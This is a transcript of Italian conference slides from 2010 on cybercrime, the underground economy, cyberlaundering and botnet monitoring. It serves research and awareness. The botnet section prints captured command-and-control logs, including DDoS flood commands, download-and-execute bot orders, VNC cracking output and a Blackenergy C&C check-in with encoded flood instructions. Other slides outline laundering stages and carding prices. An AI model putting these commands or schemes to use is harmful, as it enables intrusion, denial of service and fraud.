CyberCrime e dintorni ;) Security Summit Roma 10 Giugno 2010

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "CyberCrime e dintorni ;) Security Summit Roma 10 Giugno 2010"

Transcript

1 CyberCrime e dintorni ;) Security Summit Roma 10 Giugno

2 Relatori 2 Introduce e modera Paolo Colombo Senior Security Consultant Accenture Intervengono Raoul Chiesa ENISA PSG, CLUSIT Claudio Guarnieri Ricercatore indipendente Shadowserver Foundation Marco Pacchiardo Principal Consultant British Telecom

3 Agenda 3 Definizione di CyberCrime CyberCrime Underground Economy Cyberlaundering Botnet Conclusioni

4 Cybercrime 4 Definizione di CyberCrime Raoul Chiesa

5 Disclaimer

6 Raoul s Disclaimer 6 Le informazioni contenute in questa presentazione non infrangono alcuna proprietà intellettuale, nè contengono strumenti o istruzioni che potrebbero essere in conflitto con la vigente legislazione. I dati statistici ed i profili appartengono all Hackers Profiling Project (HPP), sotto il patrocinio dell UNICRI e dell ISECOM. I marchi registrati appartengono ai rispettivi proprietari. Le opinioni qui espresse sono quelle dell autore e non rispecchiano necessariamente quelle dell UNICRI, di altre agenzie delle Nazioni Unite, dell ENISA o del CLUSIT.

7 Raoul nobody Chiesa 7 Comitato Direttivo e Comitato Tecnico- Scientifico del CLUSIT ( ), socio Fondatore Membro del Permanent Stakeholders Group (PSG) dell ENISA European Network & Information Security Agency Senior Advisor, Strategic Alliances & Cybercrime Issues, UNICRI United Nations Interregional Crime & Justice Research Institute Mediaservice.net Board of Directors, ISECOM Institute for Security and Open Methodologies Board of Directors, OWASP Italian Chapter Associated Partner, TSTF Telecom Security Task Force ICANN (ALS)

8

9 Cos è il Cybercrime? 9 Wikipedia Italia non lo sa Wikipedia intl. risponde: Computer Crime

10

11 Cos è il Cybercrime? (2nd try!) 11 Computer crime - From Wikipedia, the free encyclopedia (Redirected from Cybercrime: Computer crime refers to any crime that involves a computer and a network, where the computers may or may not have played an instrumental part in the commission of the crime (Moore 2000). Netcrime refers, more precisely, to criminal exploitation of the Internet [1]. Issues surrounding this type of crime have become high-profile, particularly those surrounding hacking, copyright infringement, child porn, and child grooming. There are also problems of privacy when confidential information is lost or intercepted, lawfully or otherwise. On the global level, both governments and non-state actors continue to grow in importance, with the ability to engage in such activities as espionage, financial theft, and other cross-border crimes sometimes referred to as cyber warfare. The international legal system is attempting to hold actors accountable for their actions, with the International Criminal Court among the few addressing this threat. [2]

12 Cos è il Cybercrime? (2nd try!) 12 A prima vista, sembra che stiamo parlando di attori differenti, con scopi, obiettivi (target) e modelli criminosi differenti.

13 Hackers Profiling Project (UNICRI, ISECOM, CLUSIT) 13 PROFILE OFFENDER ID LONE / GROUP HACKER TARGET MOTIVATIONS / PURPOSES Wanna Be Lamer 9-16 years I would like to be a hacker, but I can t GROUP End-User For fashion, It s cool => to boast and brag Script Kiddie years The script boy GROUP: but they act alone SME / Specific security flaws To give vent of their anger / attract mass-media attention Cracker years The destructor, burned ground LONE Business company To demonstrate their power / attract mass-media attention Ethical Hacker years The ethical hacker s world LONE / GROUP (only for fun) Vendor / Technology For curiosity (to learn) and altruistic purposes Quiet, Paranoid, Skilled Hacker years The very specialized and paranoid attacker LONE On necessity For curiosity (to learn) => egoistic purposes Cyber-Warrior years The soldier, hacking for money LONE Symbol business company / End-User For profit Industrial Spy years Industrial espionage LONE Business company / Corporation For profit Government Agent years CIA, Mossad, FBI, etc. LONE / GROUP Government / Suspected Terrorist/ Strategic company/ Individual Espionage/ Counter-espionage Vulnerability test Activity-monitoring Military Hacker years LONE / GROUP Government / Strategic company Monitoring / controlling / crashing systems

14 Industrial Espionage: cos è? 14 (da wikipedia) Industrial espionage or corporate espionage is espionage conducted for commercial purposes instead of national security purposes. Espionage takes place in many forms. In short, the purpose of espionage is to gather knowledge about (an) organization(s). A spy may be hired, or may work for oneself.

15 Zooming 15 The term is distinct from legal and ethical activities such as examining corporate publications, websites, patent filings, and the like to determine the activities of a corporation (this is normally referred to as competitive intelligence). Theoretically the difference between espionage and legal information gathering is clear. In practice, it is sometimes quite difficult to tell the difference between legal and illegal methods. Especially if one starts to consider the ethical side of information gathering, the border becomes even more blurred and elusive of definition. Industrial espionage describes activities such as theft of trade secrets, bribery, blackmail, and technological surveillance. As well as spying on commercial organizations, governments can also be targets of commercial espionage for example, to determine the terms of a tender for a government contract so that another tenderer can underbid. Industrial espionage is most commonly associated with technology-heavy industries, particularly the computer and automobile sectors.

16 Una riflessione 16 Information can make the difference between success and failure; if a trade secret is stolen, the competitive playing field is levelled or even tipped in favor of a competitor. (ne parleremo dopo)

17 Cos è l Intelligence? (agenzie) 17 From wikipedia: (http://en.wikipedia.org/wiki/intelligence agency) An intelligence agency is a governmental agency that is devoted to the information gathering (known in the context as "intelligence") for purposes of national security and defense. Means of information gathering may include espionage, communication interception, cryptanalysis, cooperation with other institutions, and evaluation of public sources. The assembly and propagation of this information is known as intelligence analysis. Intelligence agencies can provide the following services for their national governments: provide analysis in areas relevant to national security; give early warning of impending crises; serve national and international crisis management by helping to discern the intentions of current or potential opponents; inform national defense planning and military operations; protect secrets, both of their own sources and activities, and those of other state agencies; and may act covertly to influence the outcome of events in favor of national interests. Intelligence agencies are also involved in defensive activities such as counter-espionage or counter-terrorism. Some agencies are accused of being involved in assassination, arms sales, coups d'état, and the placement of misinformation (propaganda) as well as other covert operations, in order to support their own or their governments' interests.

18 Cos è l Info Warfare? 18 From wikipedia: (http://en.wikipedia.org/wiki/information_warfare)

19 Cos è l Information Warfare? (cont.) 19 From wikipedia: (http://en.wikipedia.org/wiki/information_warfare ) Information warfare is the use and management of information in pursuit of a competitive advantage Over an opponent. Information warfare may involve Collection of tactical information, assurance(s) that one's own information is valid, spreading of propaganda or disinformation to demoralize the enemy and the public, undermining the quality of opposing force information and denial of information-collection opportunities to opposing forces. Information warfare is closely linked to psychological warfare.

20 Attention, please! Se cerchiamo Cyber Warfare, Wikipedia sa di che cosa stiamo parlando! (anche se, lo inserisce sotto computer crimes.strana la vita eh ) The U.S. Department of Defense (DoD) notes that cyberspace has emerged as a national-level concern through several recent events of geo-strategic significance. Among those are included the attack on Estonia's infrastructure in 2007, allegedly by Russian hackers. "In August 2008, Russia again allegedly conducted cyber attacks, this time in a coordinated and synchronized kinetic and non-kinetic campaign against the country of Georgia. Fearing that such attacks may become the norm in future warfare among nation-states, the concept of cyberspace operations impacts and will be adapted by warfighting military commanders in the future.

21 Ma di che Paesi stiamo parlando? USA ( everywhere, always!) UK, Canada, Francia, Russia, Switzerland Brazil Israel & Palestinian National Authority Zimbabwe Middle East: Paesi amici (UAE, Saudi Arabia ) China India Pakistan North Korea (DPRK) South Korea Iran Tatarstan Kyrgyzstan Ingushetia (ex URSS) Myanmar Russia (Estonia, Georgia) Low Risk Average Risk High Risk

22 Ma cosa possono fare, esattamente? 22

23 Ma cosa possono fare, esattamente? /2 23

24 Esempi 24 Non penso sia necessario riepilogare, zoomare, commentare gli incidenti già avvenuti. E sufficiente elencarli.per lasciare la parola ai prossimi interventi.e ritornarci poi sopra tutti insieme, durante il dibattito: Estonia Cyber-war (2007) Russia-Georgia Cyber-war (2008) North-Korea Attacks (2009) Google-Cina Operation Aurora (2010)

25

26

27

28 Punti di contatto tra questi mondi? YES! 28 PC Zombie (botnet) -> approfittano dell utonto medio, sia in contesto corporate (company s policy permettendo.ma l utente riesce sempre, somehow, ad aggirarle!) che casalingo (broadband). 0-days : ad oggi, tutti su sistemi MS Windows 0-days : ad oggi, nessuna vulnerabilità non nota exploitata, ma bugs su IE6.0 (!) & co (per l attacker) cambia poco/oramai quasi nulla, ownare i 100/1000 PC dell azienda X, o 100 broadband di utenti finali

29 29

30 30 Videoclip (3 minuti, Olanda)

31 Per concludere (e riflettere) 31

32 Cybercrime 32 Cybercrime Underground Economy Claudio Guarnieri

33 Keywords 33 Cybercrime Black Market Malware Botnets Malicious Software Reti (networks) di computer infetti controllati, tramite dei malware robot automatizzati, da un entità criminale. Derivate dei Remote Administration Tool, ma con target di massa.

34 Black Market 34 Administrator Administrator Guarantors Moderator Moderator Moderator Moderator Trial Seller Trial Seller Verified Seller Verified Seller Verified Seller Verified Seller Verified Seller Verified Seller User User User User User User User User User User User User User User User User

35 Il Black Market visto da Customer 35 Crearsi una struttura per inserirsi nel cybercrime e nel suo relativo mercato non è difficile e si può essere operativi con un investimento minimo e nessuna particolare competenza tecnica. Toolkit per Infezione di massa Acquisto Malware Acquisto Traffico Encrypting Malware Acquisto Servizio di Hosting

36 Guarantors 36 In Verifica. Questi Forum sono amministrati dai Guarantors, che si fanno garanti di ogni vendita. I Guarantors verificano ogni offerta di vendita certificando prodotto e venditore ed approvando così la commercializzazione sul proprio portale. Per questo servizio molto spesso richiedono ai verified seller o una tassa di iscrizione o una percentuale su ogni vendita.

37 Malware Developers 37 In questo Forum Post il venditore offre un malware di nome SpyEye con features di Keylogging e Grabbing di credenziali HTTP e FTP. 500$

38 Packers Developers 38 In quest altro post il venditore offre un servizio di Packing di malware, che permetterebbe il bypass di tutti i Firewall e Antivirus ed il bypass dell User Access Control di Windows Vista e Windows 7. Supporto 24/7. 488$ o 200$ al mese

39 Exploit Kits Developers 39 In questo post viene venduto un Exploit Kit completo di exploits per Internet Explorer, Adobe Reader, Flash, Microsoft DirectShow ed Excel. 800$

40 Bulletproof Hosting 40 In questo post vengono offerti servizi di Hosting di vario tipo (Shared, VPS, Dedicated etc.). Piani tariffari e tecnici personalizzati, anonimato, sistema anti-black che permette il bypass di sistemi di spam filtering e malware listing. Tariffario non pubblico :-(

41 Bulletproof Hosting (2) 41

42 Traffic Sellers 42 Traffico da siti/utenti compromessi in US, GB, AU, CA e DE 1000 visite a 7$ acquisto minimo 5000 visite In questo caso è messo in vendita del Traffic, ossia quantità di richieste HTTP di utenti ignari su siti legittimi, ma compromessi, che vengono redirette a domini malevoli (di proprietà dell acquirente) generalmente ospitanti degli Exploit Kits. Molto spesso viene generato traffico in vendita anche tramite MSN spam.

43 Da Customer a Seller 43 Diretto Botnet Master Indiretto Vendita Botnet Programmi di Affiliazione DDoS Rental Vendita Identità Spam Campaigns Click Fraud Campaigns Fake AV Campaigns Vendita CC

44 DDoS Rental 44 Stanchi dei vostri concorrenti? Stanchi del nemico? Questo venditore offre servizi di Distributed Denial of Service su richiesta. Disponibilità e supporto 24/7, test gratuito di 5-10 minuti. 60$/giorno 120$/giorno se protezione anti-ddos

45 Carding 45 US visa/us master $2.5 Random ITALY cc $17 BOA, CITI, CHASE.COM LOGIN +PASS FULLS COMPLETE BALANCE: $25000 verified PRICE: $525

46 Carding (2) 46 Per certificare la propria credibilità vengono spesso inseriti dai dati di Carte di Credito Demo, ossia disponibili all eventuale acquirente per verificare che il venditore sia in buona fede. Questo caso è completo di qualsiasi informazione relativa al possessore della carta.

47 Carding (3) 47 Un account PayPal con saldo di 1000$ 50$ Un account Bank of America con saldo da 75000$ a $ 300$ Pagamenti tramite LibertyReserve.com e WesternUnion

48 Carding (4) 48 I Carders non fanno certo segreto del proprio mercato :-)

49 Spam Campaigns 49 Uno dei metodi più proficui per un gestore di Botnet è lo Spam. In questo post una organizzazione di nome EvaPharmacy offre affiliazione per Botnets. In cambio di una campagna di Spam offrono il 45% per ogni acquisto da 60$ a 100$ proveniente dalla propria campagna. L 85% dello Spam totale è stimato provenire da Botnets.

50 Click Fraud Campaigns 50 In base alle statistiche di ClickForensics il Cybercrime nel 2008 ha ricavato 33 milioni di dollari da campagne di Click Fraud.

51 Fake AntiVirus Campaigns 51

52 Fake AntiVirus Campaigns (2) 52 Recentemente è stato incriminato un gruppo di criminali autori di una campagna di Fake AV Fraud che secondo gli inquirenti ha fruttato circa 100 milioni di dollari.

53 53 Cyberlaundering Marco Pacchiardo CYBERCRIME

54 Cos è? 54 E il riciclaggio di denaro in modo elettronico Utilizzato per ripulire denaro proveniente da attività illecite o utilizzato per finanziare attività illecite Si basa principalmente su 3 concetti: Placement Layering Integration

55 Placement Layering Integration 55

56 Placement Integration Layering 56 Banca 1 Banca 2 Banca 3 Banca 4 Banca 5 Banca 6 Banca 7 Banca 8 Banca off shore Beni immobili Azienda off shore Azienda Ghost Beni di lusso

57 Vantaggi 57 Placement Layering Integration Peso / Volume Disintermediazione Frazionamento Bassa Rintracciabilità Movimentazione elettronica Alta Velocità Basso Controllo Assenza di contatto Nessun registro / log

58 Esempi 58 Placement Layering Integration E-Gold IVTS SHELL / GHOST / FRONT COMPANIES PC / PALMARE ATM DENARO ELETTRONICO O IMPALPABILE PARADISI FISCALI BENI IMMOBILI E DI LUSSO INTERNET GAMBLING SOCIAL NETWORK smaterializzazione materializzazione

59 Esempi di Placement 59 Hawala Fen C hui Droga al dettaglio Acquisto ebay card Second Life Carte pre pagate Viaggi di piacere

60 Esempi di Layering 60 Suddivisione denaro su n conti Acquisto beni su ebay IVTS -> Hawala / Fen C hui Suddivisione su n aziende

61 Esempi di Integration 61 Acquisto appartamenti e beni immobili Conto su banca off-shore Acquisto titoli di stato Riconciliazione carte e IVTS E-Gold

62 Placement 62 Utilizzo identità false (persone, aziende) Smurfing (telefono, sistemi on-line, carte prepagate..) Trasferimenti di denaro verso banche offshore (utilizzo di internet, criptazione, draft ...) IVTS Loan-back (prestito su compagnie offshore)

63 Placement (2) 63 e-gold, Goldmoney, e-bullion, AnonymousGold Utilizzo di ATM con card per e-gold Mpay Paysafecard (ma non è possibile Layering e Integration perchè non permette pagamenti person-to-person) Modex, Proton, VisaCash

64 Esempi 64 Placement Layering Integration

65 Esempi (2) 65 Placement Layering Integration Banca Israeliana Banca di origine Banca a Panama

66 Esempi 66 Placement Layering Integration

67 Internet Service Provider 67 The persons on investigation were directors of a company involved in purchasing large quantities of duty free cigarettes and alcohol to sell on the domestic market contrary to their export-duty free status, thus avoiding tax obligations. In one file, the bank account in Belgium of an individual was credited by wire transfers from an Internet payment service provider (small amounts for a total of EUR 4 700). The subject was under investigation in another European country for the sale of drug starters. Information from law enforcement confirmed that the subject was selling drug starters via a commercial website. On 27 April 2007, a federal grand jury in Washington, D.C., indicted two companies operating a digital currency business and their owners. The indictment charges E-Gold Ltd., Gold and Silver Reserve, Inc., and their owners with one count each of conspiracy to launder monetary instruments, [...]. According to the indictment, persons seeking to use the alternative payment system E-Gold were only required to provide a valid address to open an E-Gold account no other contact information was verified. The majority of the wire transfers are of small amounts (maximum EUR 800), originate from various senders and, following the message accompanying the payment, should be related to sales on a commercial website, sometimes the sales of luxury goods. Payments are not made through an Internet payment service provider but originate from the bank account of the buyer and are credited on the bank account of the seller. The wire transfers are followed by instant withdrawals in cash. The goods are never delivered to the buyer (victim of a non-delivery fraud).

68 Calcio? 68 The FIU of country B received a disclosure from a bank with regard to suspicious transactions concerning club A. This club, which was in financial difficulties, was looking for funds (several million EUR) in order to avoid bankruptcy. A financing proposal was put forward by a financial group established in South America. It was linked to an individual that had already invested funds in various foreign clubs. These funds were suspected to be of illegal origin. After the bank inquired into the origin of the funds the financial group withdrew from the negotiations. A second financing proposal was then put forward by Mr. COX, a European investor through his company located in a tax haven. Suspicions were aroused because this individual, unfamiliar to the world of sports, had suddenly suggested investing money of unknown origin in club A. Additional information showed that Mr. COX was known to the police and FIU for various cases of fraud. In this case the different possibilities for investing in club A can be considered to be attempts to launder money of illegal origin. Italy has experienced an attempt to launder money through the purchase of a famous Italian football team. The investigations16 to detect the case started from judicial proceedings in The Procura della Repubblica suspected that financial crimes were occurring, such as, money laundering, insider trading and misuse of market information.. [ ] Investigations uncovered evidence that the money used to buy the shares was supplied by a criminal association operating in Central Italy. Further, a part of that money, supposedly offered to the football team as sponsorship, was then diverted to another company to purchase real estate, which was subsequently seized by Italian judicial authorities. Investigators identified that the criminal association was strongly interested in purchasing the football team with funds obtained from several offences.

69 Giochi? 69 Casinò on line per riciclare proventi di droga SecondLife: pagamento droga con soldi virtuali SecondLife: Multi-avatar per pagare merce virtuale a se stessi Vendita di soldi virtuali ad altri giocatori

70 Banche e Finanza 70 Clearing House Interbank Payments System (CHIPS)

71 LEGISLAZIONE INTERNAZIONALE 71 Trasferimento di denaro Direttiva 2001/97/EC, Articolo 3 -> log oltre US Patriot Act Section 326 -> $ /60/CE prevenzione dell'uso del sistema finanziario a scopo di riciclaggio dei proventi di attività criminose e di finanziamento del terrorismo Direttive FATF 40 Direttive + 19 raccomandazioni

72 Legislazione 72 United Nations (UNODC) Vienna Convention: Convention Against Illicit Traffic in Narcotic Drugs and Psychotropic Substances, 19 December, 1988 International Convention for the Suppression of the Financing of Terrorism, 9 December, 1999 Palermo Convention: Convention Against Transnational Organized Crime, 15 November, 2001 UN Security Council Resolutions European Union (EU) Strasbourg Convention: Convention on Laundering, Search, Seizure and Confiscation of the Proceeds from Crime, 8 November, 1990 Council common position on combating terrorism (2001/930/CFSP), 27 December, 2001 Council common position on the application of specific measures to combat terrorism (2001/931/CFSP), 27 December, 2001 Warsaw Convention: Council of Europe Convention on Laundering, Search, Seizure and Confiscation of the Proceeds from Crime and on the Financing of Terrorism, 16 May, 2005 Directive 2005/60/EC, 26 October, 2005 Financial Action Task Force (FATF) 40 Recommendations, June, Special Recommendations, 22 October, 2004 Egmont Group of Financial Intelligence Units Statement of Purpose, 23 June, 2004

73 FATF membri, di cui 33 giurisdizioni 2 organizzazioni regionali (Gulf Cooperation Cuncil & European Commission)

74 FATF Working Groups 74

75 Esistono delle contromisure? 75 Esistono dei software che per loro natura sono localizzati Esiste una legislazione frammentata e degli enti intrenazionali Parere personale: Lavoro di intelligence a livello internazionale Network informale: persone, non enti Intensificazione della Digital Forensics Conoscenza delle tecniche di CyberCrime e delle tecnologie utilizzate

76 Cybercrime 76 Botnet Claudio Guarnieri

77 Rete di computers infetti (zombies) controllati da specifici malware chiamati: Bot Una o più reti di questo tipo sono controllate da un entità criminale comunemente chiamata: Botmaster Botnet Ogni Botnet è gestita e comandata dal proprio Botmaster tramite un: Command & Control (C&C) Il Botmaster sfrutta i dati, la capacità computazionale e la rete di ogni zombie per specifiche Campagne Criminali 77

78 Utilizzi delle Botnets 78 DDoS Keylogging Scareware, Adware Installing Spamming Sniffing Rubare altre Botnets? Mass Identify Theft

79 Formazione e Propagazione Una Botnet per formarsi e crescere deve raccogliere zombies i quali passano attraverso tre fasi: 79 Exploiting Infecting Assimilating Più una Botnet dispone di zombies più potenza di fuoco avrà. Per questo motivo molto spesso i bot vengono forniti di funzioni per spreading su Internet.

80 Gestione e Controllo Ogni Botnet è controllata e gestita tramite un Command & Control (C&C), che è un interfaccia tra gli zombies e il Botmaster. 80 In figura uno schema che rappresenta una struttura di Command & Control centralizzato. Nonostante esistano molti esempi di Botnet Peer 2 Peer (Storm, Waledac etc.) ci concentreremo su questa struttura essendo la più comune. In particolar modo vedremo Botnet basate su Internet Relay Chat (IRC).

81 Qualche Numero Questo grafico mostra il numero approssimativo di Botnets monitorate attivamente dall infrastruttura di Shadowserver Foundation negli ultimi 6 mesi: Ogni Botnet ha un ciclo di vita di una durata generalmente determinata a seconda del proprio scopo.

82 C&C Geolocation Questa mappa rappresenta la distribuzione geografica dei C&C attualmente conosciuti a Shadowserver.

83 Zombies Geolocationing In questa mappa sono rappresentati gli Zombies rilevati da Shadowserver nell arco di 24 ore. E una stima approssimativa e in parte fin troppo ottimistica.

84 Shadowserver Tracking Process 84 80

85 Infiltrazione fai-da-te Snoopyd è un framework per Botnet Infiltration. E fornito di un demone XMLRPC che rimane in ascolto per richieste di infiltrazione. Per ora supporta solo IRC, ma è in sviluppo il supporto per Botnet HTTP. Ogni drone monitora l attività della Botnet e invia ogni informazione ad un DataBase. Per ogni richiesta ricevuta, Snoopyd effettua il deployment di un drone che replica la connessione di un vero zombie Bot.

86 Snoopyd Snoopyd è fornito di una semplice Web Interface che permette di visualizzare i risultati del monitoring.

87 Snoopyd (2) Per ogni Botnet monitorata vengono presentate delle informazioni riassuntive: hostname, IP, reverse DNS, geolocation e parametri di connessione.

88 Snoopyd (3) Il traffico della Botnet monitorata viene salvato interamente in una base di dati.

89 IRC Internet Relay Chat è un protocollo di comunicazione TCP/TLS. E basato su dei channel, ossia delle chatroom in cui gli utenti possono incontrarsi e comunicare. IRC è comunemente usato nel cybercrime sia come strumento di comunicazione e piazza di vendita sia come base operativa per la gran parte di Botnets. In questi casi il server e canale IRC rappresentano il C&C della Botnet dove tutti gli zombie si collegano in attesa di ricevere istruzioni dal Botmaster.

90 Assimilazione nella Botnet Connessione al C&C e ingresso nel canale: -> NICK ITA 00 XP SP2 L > USER pajgsqbz 0 0 :ITA 00 XP SP2 L <- Welcome to the [CENSORED] IRC Network ITA 00 XP SP2 L ! <- AUTH :*** Found your hostname (cached) <- AUTH :*** Looking up your hostname... -> JOIN ##sodoma_3 s0dom4j03 <- ##sodoma_3 :.root.start dcom a -r s <- ##sodoma_3 drake <- ##sodoma_3 :ITA 00 XP SP2 <- ##sodoma_3 :End of /NAMES list. Una volta entrato il bot per prima cosa legge il titolo del canale ed eseguo il comando in esso contenuto.

91 Gestione della Botnet Il Botmaster entra in canale: NeO_Anderson joined #a <Guard-v1_5> Welcome to #a sir, may I take your coat? ;-) Il Botmaster effettua l autenticazione e comanda un download: <ddos>.login s3x <ddos>.download C:install.exe 1

92 Sodoma Botnet Come nostro primo esempio vediamo una Botnet, gestita da Italiani, di basso profilo ma istruttiva.

93 Sodoma Botnet (2) <KrOwN>.irc.activate c0d1am0z3 -s<krown>.root.stop -s <drake>.ddos.icmp 77.xxx.xxx.xxx 450 -s <KrOwN>.ddos.supersyn 109.xxx.xxx.xxx s <KrOwN>.ddos.hack 94.xxx.xxx.xxx s.ddos.ack? :-P Gli attacchi DDoS seguenti hanno come bersaglio altri C&C: <KrOwN>.ddos.supersyn 82.xxx.xxx.xxx s <KrOwN>.ddos.supersyn 79.xxx.xxx.xxx s <KrOwN>.ddos.supersyn 213.xxx.xxx.xxx s La maggior parte di queste Botnet nemiche sono italiane.

94 Sodoma Botnet (3) CENSORED

95 F*****g Botnet In questo caso la Botnet è di dimensioni notevoli (Circa Zombies), pericolosa e molto attiva.

96 F*****g Botnet (2) * ddos sets +v to [M]ARG <ddos>.login s3x <[M]ARG 04428> -main- Password accepted. <ddos>.icmp 69.xxx.xxx.xxx 200 <[M]ARG 04428> -icmp- Flooding: (69.xxx.xxx.xxx) for 200 seconds. <[M]ARG 04428> -icmp- done with flood to 69.xxx.xxx.xxx. sent KB/sec (1MB). <ddos>.skysyn 69.xxx.xxx.xxx <[M]ARG 04428> -skysyn- Flooding: (69.xxx.xxx.xxx:53) for 100 seconds. <ddos>.download C:install.exe 1 <[M]ARG 27537> -download- Downloading URL: to: C:install.exe. <[M]ARG 27537> -download- downloaded KB to 18.8 KB/sec <[M]ARG 27537> -download- opened C:install.exe

97 F*****g Botnet (3) L organizzazione dietro alla gestione di questa Botnet risulta essere di origine Serba. Il loro target nell arco di 15 giorni di monitoring è sempre stato un Network sospetto (molto simile a RBN) di origine Pakistana. Anti-DDoS Infrastructures Datacenters Hosting Network Pakistana sospetta

98 F*****g Botnet (4) CENSORED

99 VNC Botnet Questa è sicuramente la Botnet più pericolosa che analizzeremo oggi. Come il nome suggerisca si occupa di violare accessi VNC.

100 VNC Botnet (2) Questa Botnet in un periodo di 10 giorni di monitoring aveva all attivo circa zombies ad occuparsi di cercare e violare macchine con VNC vulnerabili, le cui credenziali vengono passate in chiaro nel canale. <[nlh-vnc]njrold> [RAGE SCAN:] range: 71.x.x.x/94 threads. <[nlh-vnc]ozburt> [RAGE SCAN:] range: 87.x.x.x/94 threads. <[nlh-vnc]cdnvon> VNC3.6 CRACKED ([CENSORED]) 76.xxx.xxx.xxx 1234 <[nlh-vnc]unsuii> VNC3.8 CRACKED ([CENSORED]) 213.xxx.xxx.xxx authbypass <[nlh-vnc]llpdpl> VNC3.6 CRACKED ([CENSORED]) 64.xxx.xxx.xxx <[nlh-vnc]zyzavm> VNC3.8 CRACKED ([CENSORED]) 84.xxx.xxx.xxx <[nlh-vnc]vaxtjr> VNC3.3 CRACKED ([CENSORED]) 91.xxx.xxx.xxx 1234 <[nlh-vnc]sxlrmy> VNC3.6 CRACKED ([CENSORED]) 83.xxx.xxx.xxx 1234 <[nlh-vnc]ppmoyi> VNC3.6 CRACKED ([CENSORED]) 201.xxx.xxx.xxx admin <[nlh-vnc]qsggos> VNC3.7 CRACKED ([CENSORED]): 201.xxx.xxx.xxx - [NoPass]

101 VNC Botnet (3) Nell arco di 10 giorni sono state compromesse un totale di circa macchine complete di IP e Password

102 VNC Botnet (4) Decine di macchine appartenenti a reti universitarie di ogni parte del globo. La maggior parte appartenenti a dipartimenti di Information Technology (:-P) Molte appartenenti a reti inter-universitarie e Research Networks Macchine appartenenti a laboratori di ricerca governativi Macchine appartenenti ad Investment Groups di primo piano Appartenenti a famosi siti di e-commerce Molte compagnie telefoniche Appartenenti a Ministeri (anche di Informatica e delle Comunicazioni) Sì, ce ne sono anche di Italiane :-(

103 VNC Botnet (5) <sh3llx> you bastard <sh3llx> like to spy? *** You are permanently banned from M0dded MrAnToN (pwned By sh3llx!) ERROR :Closing Link: [nlh-vnc]wpjscd (User has been permanently banned from M0dded MrAnToN (pwned By sh3llx!)) I droni per monitoring essendo una replica solo marginale del comportamento di un Bot reale prima o poi vengono identificati e banditi dal C&C. Molto spesso dopo che vengono scoperti degli infiltrati, l intera Botnet viene clonata e spostata in un altra sede.

104 Botnets HTTP Nonostante le Botnet IRC siano ancora molto diffuse e le più educative da monitorare, negli ultimi 2-3 anni osserviamo un importante aumento di C&C HTTPbased. Zombie HTTP C&C Assimilazione

105 ZeuS Builder

106 ZeuS Control Il Control Panel di ZeuS offre un interfaccia Web molto user-friendly.

107 ZeuS Control (2) Per ogni autenticazione HTTP intercettata viene creato un comodo report con tutte le credenziali a disposizione.

108 Blackenergy

109 Blackenergy (2) Il Bot una volta installato contatta un server HTTP su cui effettua una richiesta POST che serve sia per registrare lo Zombie nel C&C sia per ottenere istruzioni da eseguire. POST /dot/stat.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;.NET CLR ) Host: [CENSORED].cn Content-Length: 31 Cache-Control: no-cache id=xxx_xxxxxxx&build_id=d5729

110 Blackenergy (3) La risposta del server sono delle istruzioni da eseguire encodate in Base 64: HTTP/ OK Date: Tue, 25 Sep :30:13 GMT Server: Apache/ (Unix) FrontPage/ PHP/5.2.3mod_ssl/ OpenSSL/0.9.7e-p1X-Powered-By: PHP/5.2.3 Content-Length: 80 Connection: close Content-Type: text/html MTA7MjAwMDsxMDswOzA7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI3[ CENSORED]==

111 Blackenergy (4) ;2000;10;0;0;30;100;3;20;1000;2000#wait#10#xXXX_XXXXXX 10;3000;10;1;0;30;10;25;15;2000;3000#flood http [CENSORED].org.ua#5#xXXX_XXXXXX 10;2000;10;1;0;30;50;50;20;1000;2000#flood syn 80,81,82,83,443,25,22,21,110#10#xXXX_XXXXXX

112 Blackenergy (5)

113 TweBot Builder

e-spare Parts User Manual Peg Perego Service Site Peg Perego [Dicembre 2011]

e-spare Parts User Manual Peg Perego Service Site Peg Perego [Dicembre 2011] Peg Perego Service Site Peg Perego [Dicembre 2011] 2 Esegui il login: ecco la nuova Home page per il portale servizi. Log in: welcome to the new Peg Perego Service site. Scegli il servizio selezionando

Dettagli

Proteggere le informazioni in tempo di crisi: si può essere sicuri con investimenti contenuti? Lino Fornaro Net1 sas Giovanni Giovannelli - Sophos

Proteggere le informazioni in tempo di crisi: si può essere sicuri con investimenti contenuti? Lino Fornaro Net1 sas Giovanni Giovannelli - Sophos Proteggere le informazioni in tempo di crisi: si può essere sicuri con investimenti contenuti? Lino Fornaro Net1 sas Giovanni Giovannelli - Sophos L Autore Lino Fornaro, Security Consultant Amministratore

Dettagli

Ministero della Salute Direzione Generale della Ricerca Scientifica e Tecnologica Bando Giovani Ricercatori - 2007 FULL PROJECT FORM

Ministero della Salute Direzione Generale della Ricerca Scientifica e Tecnologica Bando Giovani Ricercatori - 2007 FULL PROJECT FORM ALLEGATO 2 FULL PROJECT FORM FORM 1 FORM 1 General information about the project PROJECT SCIENTIFIC COORDINATOR TITLE OF THE PROJECT (max 90 characters) TOTAL BUDGET OF THE PROJECT FUNDING REQUIRED TO

Dettagli

Informazioni su questo libro

Informazioni su questo libro Informazioni su questo libro Si tratta della copia digitale di un libro che per generazioni è stato conservata negli scaffali di una biblioteca prima di essere digitalizzato da Google nell ambito del progetto

Dettagli

Guida ai Parametri di negoziazione dei mercati regolamentati organizzati e gestiti da Borsa Italiana

Guida ai Parametri di negoziazione dei mercati regolamentati organizzati e gestiti da Borsa Italiana Guida ai Parametri di negoziazione dei mercati regolamentati organizzati e gestiti da Borsa Italiana Versione 04 1/28 INTRODUZIONE La Guida ai Parametri contiene la disciplina relativa ai limiti di variazione

Dettagli

MODULO DI ISCRIZIONE - ENROLMENT FORM

MODULO DI ISCRIZIONE - ENROLMENT FORM Under the Patronage of Comune di Portofino Regione Liguria 1ST INTERNATIONAL OPERA SINGING COMPETITION OF PORTOFINO from 27th to 31st July 2015 MODULO DI ISCRIZIONE - ENROLMENT FORM Direzione artistica

Dettagli

IBM Cloud Computing - esperienze e servizi seconda parte

IBM Cloud Computing - esperienze e servizi seconda parte IBM Cloud Computing - esperienze e servizi seconda parte Mariano Ammirabile Cloud Computing Sales Leader - aprile 2011 2011 IBM Corporation Evoluzione dei modelli di computing negli anni Cloud Client-Server

Dettagli

Zeroshell come client OpenVPN

Zeroshell come client OpenVPN Zeroshell come client OpenVPN (di un server OpenVpn Linux) Le funzionalità di stabilire connessioni VPN di Zeroshell vede come scenario solito Zeroshell sia come client sia come server e per scelta architetturale,

